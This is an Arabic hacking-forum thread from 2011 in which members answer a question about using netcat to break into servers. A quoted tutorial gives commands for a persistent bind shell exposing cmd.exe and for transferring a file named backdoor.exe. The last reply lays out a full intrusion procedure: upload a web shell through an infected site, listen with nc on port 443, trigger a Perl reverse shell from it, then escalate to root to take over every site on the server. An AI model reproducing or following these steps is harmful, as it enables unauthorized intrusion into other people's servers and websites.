netcat

kalachnikov hacker · 03-01-2011, 10:11 PM

السلآم عليكم
ما هو netcat
و كيف يتم الإختراق به
+ إن كآن ممكن شرح الإختراق به ...

المصدر: :: vBspiders Professional Network ::

Vspan style="font-weight: bold; color: #006400;"Cl[hf:VLspanC netcat

المفترس · 03-02-2011, 12:15 PM

النت كات هو عبارة عن برنامج يعمل في بيئة الدوس يسمح لك بعمل اتصال عكسي او مباشر مع السيرفر ويستخدم بكترة
لاخد الرووت على السيرفر او لفحص البورتات المفتوحة فيه

الرووت صلاحية في نظام اللينوكس تسمح لك بالتحكم في جميع ملفات والقيام بجميع العمليات من اعادة تسمية الملفات ونسخ وحدف ومشاهدة وتعديل لملفات
الدوس هدا نظام صغيرمدموج مع النظام الاساسي ويمكنك الدخول عليه من
ابدا
تشغيل
اكتب cmd
وسيظهر لك
البورتات منافد الاتصال في جهاز تخيلهم كانهم نوافد تدخل منهم المعلومات الى جهاز القادمة من جهاز اخر متصل

اما الاختراق به فهدا يحتاج فيديو بكامل ابحت في قوقل وان شاء الله تجد

وبالتوفيق

NeTCaT-Ma · 03-02-2011, 03:20 PM

وهدا هو النت كات
http://www.multiupload.com/H13N5SMEQZ
ضع مجلد netcat إن كان لديك الوندوز في c:\
يمكنك تشغيله هكدا
إبدأ
run
cmd
أكتب cd netcat للدخول للمجلد
من بعد nc.exe
وها أنت دخلت إلى النت كات

loulou · 03-02-2011, 03:53 PM

تمام م قصرو معك الاخوة

kalachnikov hacker · 03-02-2011, 04:30 PM

الله يعطيكم العافية
تحياتي لكم

kalachnikov hacker · 03-02-2011, 04:32 PM

إن أكمن ذلك فيديو أو موضوع شآمل له ؟

loulou · 03-02-2011, 04:42 PM

اقتباس


	Netcat هي اداة سطر اوامر تعطيك تحكم كامل ل Socket دون معرفة مسبقبة باي لغة برمجية او حثى winsock كما يمكنك دمجها مع سكريبتات ك batch script Netcat client تسمح لك Netcat بفتح اتصال نحو اي سرفر تريد بالامر nc AdressIp 23 بتحديد ip او domaine و بور الاتصال كل ما ستكتب على لوحة المفاتيح سوف يرسل الى السرفر مباشرة قد تتسائل مع نفسك كيف تتعرف Netcat على البرتكول المستعمل, Netcat تستطيع فعل ما تريد ب Socket بصورة نصية ماذا يعني هذا الكلام ? يعني ان Netcat لا تعرف protocole المستعمل في الاتصال انما ترسل الامر كما لو انه جملة عادية. قد يتسائل بعضكم ان telnet المغفل الويندوز تقم بنفس الدور و هنا الخطاء تابع الدرس و ستتعرف على الفرق بما اننا تحدثنا عن telnet فان Netcat تقوم بنفس الدور من خلال الامر nc -t AdresseIp 23 Netcat server تطرقنا إلى Netcat في در العميل بخلاصة شديدة و الآن دورها و هي سرفر نقوم بالتنصت على بورت معين ننفذ الأمر : nc -l -p 23 -l : إعطاء أمر ل Netcat لتنصت على بورت معين -p : تحديد بورت التنصت عند تنفذ الأمر قد تقول أنNetcat قد علقت لا أخي إنما هي تنتظر استقبال اي إتصال على البورت الذي حددته الآن بواسطة عميل telnet نقوم بإجراء إتصال على جهازنا على البورت الذي حددناه سابقا لتأكد من عمل السرفر الذي صنعناه telnet 127.0.0.1 نلاحظ أن عميل telnet قد إتصل بنجاح على سرفرنا الان نكتب اي شيء في Natcat و المفاجأة كل ما كتبته في Netcat يظهر في عميل telnet كأنك أمام msn في الدوس او **************l console الآن نقوم بإغلاق عميل telnet و ينقطع الإتصال في Netcat و يغلق البورت المفتوح من طرفها لهدا المشكل حل في Netcat أي عند قطع الإتصال من العميل في مثالنا هنا هو telnet لن تقوم بإغلاق البورت بمعنى أوضح البورت سيبقى دائما مفتوح nc -L -p 23 هذه المرة L كبيرة لنقول ل netcat ان لا يغلق البورت عند قطع الإتصال من العميل كما يمكن أن نجعل سرفرنا أكثر إحترافية بوضع رسالة ترحيب للعميل المتصل كيف ذالك تابع معي قم بإنشاء ملف بأي اسم تريد في نفس مسار Netcat وأكتب فيه رسالة الترحيب وقم بتعديل أمر التصت لما يلي nc -L -p 23 < msg.txt وقم بعمل إتصال جديد بأي عميل telnet تريد لتتأكد من صحة كلامي الآن سنقوم بصنع نظام Log file لسرفرنا بتعبير أكثر دقة تسجيل كل ما يدور أثناء الإتصال في ملف Log nc -L -p 23 > Logfile.log وقم بعمل إتصال جديد بأي عميل telnet تريد لتتأكد من صحة كلامي مرة أخرى نقل الملفات من جهاز لآخر عن طريق Netcat بإستعمال الأمريين السابقين واحد في جهاز المرسل ( nc -L -p 23 < backdoor.exe ) و الاخر في جهاز المستقبل( nc -L -p 23 > backdoor.exe) Netcat لا تسمح لنا فقط بتحويل كل ما يدور اثناء الإتصال إلى ملف بل إلى برنامج أيضا سأستخدم في شرحي cmd.exe لنظام الويندوز لصنع Remote **************l تابع معي الشرح nc -L -p 23 -e cmd.exe ومن أجل التأكد من صحة ما أقول قم بتشغيل اي عميل telnet تريد و قم بإجراء إتصال على سرفرنا على البورت الدي فتحته وها سطر الأوامر يظهر لك عليك بواسطة هذا الإختيار تستطيع صنع برنامج يعمل على Socket دون معرفة مسبقة به. هناك الخيار -d آخر مهم يعمل فقط في الويندوز و هو فك Netcat عن الدوس بمعنى أدق عند إغلاق الدوس في الويندز مثلا تبقى Netcatشغالة في process فبدون هذا الخيار عند إغلاق الدوس سيتوقف سرفرنا عن العمل nc -L -p 23 -d -e cmd.exe نفذ لأمر و قم بإغلاق الدوس و شوف Netcat ليسا شغالة في process وقم بعمل إتصال جديد بأي عميل telnet تريد لتتأكد من صحة Netcat Hacking يقال أن Netcat تستطيع فعل أي شيء ب Sockets . Netcat تتوفر على أختيارات عدة متوجهة لسكان, يستعمل السكان لمعرفة الفنافد المفتوحة و الخدمات التي تعمل على السرفر او الجهاز لإجراء سكان بواسطة Netcat تابع الشرح nc -vv google.com 1-100 هذا الأمر سيعمل سكان على المنافذ من 1 إلى 100 عند تنفذ أمر السكان ، تظهر لك Netcat رسال تخبرك بحالة المنافذ refused للمنافيذ المغلقة و Open للناذ المفتوحة. أشير أيضا أن Netcat تعمل سكان من الأعلى إلى الأسفل كما توفر لك أخي Netcat خيار -r لعل سكان عشوائي nc -vv -r google.com 100-110 Netcat ليست محدودة فهي توفر لك مجموعة من الخيارات تسهل عليك الأمر nc -vv -r google.com 1-1024 4900-5000 6667 في حالة تعرفNetcat على منفذ مفتوح تقف عنده و يتمم الإتصال وبالتالي توقف السكان لحل هذا المشكل توفر لك Netcat خيار -z لإتمام السكان رغم تعرفا على منافذ مفتوحة nc -vv -r -z google.com 130-140 فتح إتصال نحوي سرفر بتحديد منافذ التصال لطرفين nc -p 65000 google.com 6667 تمنحك Netcat خيار -u لصنع Socket UDP و تستعمل لسكان UDP هناك خيار آخر -w لتحديد المدة التي تبقي Netcat تنتظر الإتصال (time-out) nc -w 5 google.com 23

و من هنا تستطيع تحميل الاداة

http://www.mediafire.com/?ryyzje0ewzk

اطلب منك لا الدعاء لي و لوالداي فقط

سلام

kalachnikov hacker · 03-02-2011, 04:52 PM

هل يجب أن يكون شل مرفوع على السرفر للإخترآق ؟

Dr.NaNo · 03-03-2011, 01:53 AM

اقتباس

المشاركة الأصلية كتبت بواسطة kalachnikov hacker


	هل يجب أن يكون شل مرفوع على السرفر للإخترآق ؟

نعم اخي العزيز .

ويجب ان يكون الشل الذي مرفوع على السيرفر به امر الاتصال العكسي يعني في بعض الشلات يكون تحت بالنهاية مكتوب للإتصال العكسي وبعضها لا يوجد او بعضها تتطرق لتنفيذ اوامر في الشل command لكي يتم الاتصال العكسي بينك وبين السيرفر..

وملاحظـة .:

الشل انت ترفعه من خلال احد المواقع المصابه التي على السيرفر. يعني لو في موقع مصاب على السيرفر ارفع شل من هناك وبعد الرفع افتح بورت 443 او اي بورت في المودك تبعكـ لكي يتم الاتصال العكسي . ثم لـ أداءة النت كات وادخل على مسارها من شاشه الدوس وشغلها ونفذ الامر .:

nc -vlp 443

يكي يبدا التنصت على البورت 443 ويمكنك تغير البورت الى اي بورت تريده لكن هذا الافضل يتم الاتصال بشكل ممتاز..

وبعد ان يتم التنصت إذهب الى الشل الي مرفوع على الموقع المصاب ومن هناك تجد تحت مكتوب للإتصالات العكسية لو انت رافع شل . سنايبر او شل r75.php او احد الشلات راح تجد تحت بنهاية الشل .منافذ الاتصال العكسي وتجد بين المنافذ الاي بي تبعك تبع الاتصال وبورت غير البورت الى البورت المفتوح في مودمك ومثلا هو 443 وتحت تجد خيار perl و c انت ضعه perl نفس ماهو .. ثم اضغط على اتصال ..

واذهب الى شاشه النت كات او الدوس وسوف تجد انه تم الاتصال بالسيرفر.

ثم نفذ في شاشه الدوس اوامر الشل id و pwd و uname -a و ..الخ من الاوامر.

وسترى انه تم التنفيذ ويمكنك استعراض الملفات وكل شي نفس طريقة الشل بالضبط ..

لكن الفائدة من الاتصال العكسي هو تخطي الحماية السيف مود او لترويت السيرفر لكي يتم إختراق جميع مواقع السيرفر او .. الخ.

هذه الفائدة من النت كات .وهو يستخدم كثيرآ جدآ..

وانا انصحكـ تتابع هذا الموضوع .:

http://www.vbspiders.com/vb/t25439.html

وفي أمان الله.
Dr.NaNo